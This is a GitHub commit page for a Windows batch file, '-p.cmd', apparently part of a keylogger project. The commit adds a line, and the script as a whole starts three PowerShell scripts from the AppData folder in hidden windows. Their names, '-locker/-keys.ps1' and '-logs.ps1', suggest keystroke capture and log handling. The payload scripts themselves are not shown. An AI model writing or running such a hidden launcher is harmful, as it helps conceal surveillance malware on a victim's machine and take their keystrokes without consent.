Update -p.cmd

This commit is contained in:
I-Am-Jakoby 2022-12-24 22:55:24 -06:00 committed by GitHub
parent 2a20d849b5
commit f432558595
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,3 +1,4 @@
@echo off
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1"